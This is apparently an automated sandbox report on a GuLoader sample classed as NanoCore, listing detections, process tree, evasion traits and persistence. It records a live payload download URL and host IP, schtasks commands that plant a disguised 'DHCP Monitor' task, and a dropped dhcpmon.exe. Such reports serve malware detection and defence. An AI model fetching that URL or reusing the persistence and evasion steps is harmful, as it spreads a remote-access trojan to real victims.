Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Variant.Razy.845229.13077.24263

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.845229.13077.24263 (renamed file extension from 24263 to exe)
Analysis ID:356594
MD5:532e58083cf5638b05f617fcbbb5d63b
SHA1:98058e52de678575ff2327d129a58313af4a3fc0
SHA256:75888910c75a9858137089eb35d48b6b1af6d43817e9a1dbb9fbc409fdaad511
Tags:GuLoader

Most interesting Screenshot:

Detection

NanoCore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Variant.Razy.845229.13077.exe (PID: 6184 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' MD5: 532E58083CF5638B05F617FCBBB5D63B)
    • RegAsm.exe (PID: 5276 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5464 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6536 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegAsm.exe (PID: 6228 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0 MD5: 529695608EAFBED00ACA9E61EF333A7C)
    • conhost.exe (PID: 4572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 1320 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 529695608EAFBED00ACA9E61EF333A7C)
    • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
Sigma detected: Scheduled temp file as task from temp locationShow sources
Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' , ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 5276, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', ProcessId: 5464

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: mtspsmjeli.sch.idVirustotal: Detection: 12%Perma Link
Source: http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.binVirustotal: Detection: 15%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeVirustotal: Detection: 32%Perma Link
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeReversingLabs: Detection: 36%
Machine Learning detection for sampleShow sources
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeJoe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses new MSVCR DllsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.26.dr
Source: Joe Sandbox ViewIP Address: 103.150.60.242 103.150.60.242
Source: Joe Sandbox ViewASN Name: PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID
Source: global trafficHTTP traffic detected: GET /cl/Maly%20nanocre%202021_ECMFFfzt176.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /cl/Maly%20nanocre%202021_ECMFFfzt176.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: mtspsmjeli.sch.id

System Summary:

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeProcess Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeCode function: 0_2_00402BF2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 31_2_02A201C8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 34_2_00D001C8
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe, 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCompurgato.exe vs SecuriteInfo.com.Variant.Razy.845229.13077.exe
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe, 00000000.00000002.732287470.00000000020A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Variant.Razy.845229.13077.exe
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeBinary or memory string: OriginalFilenameCompurgato.exe vs SecuriteInfo.com.Variant.Razy.845229.13077.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engineClassification label: mal100.evad.winEXE@13/9@7/2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4572:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{8b6f465d-30c8-4bc5-bfa5-37d69ca0c565}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeFile created: C:\Users\user\AppData\Local\Temp\~DFA5C9EF9AD60B9A70.TMPJump to behavior
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeVirustotal: Detection: 32%
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeReversingLabs: Detection: 36%
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.26.dr
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exeStatic PE information: real checksum: 0x26551 should be: 0x275bd
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeCode function: 0_2_00407E1F push 807BA529h; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeCode function: 0_2_00407A97 push 807BC128h; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeCode function: 0_2_00405745 push F7686868h; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeCode function: 0_2_00405DEC push DD0F66F5h; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeRDTSC instruction interceptor: First address: 00000000004F6455 second address: 00000000004F6455 instructions:
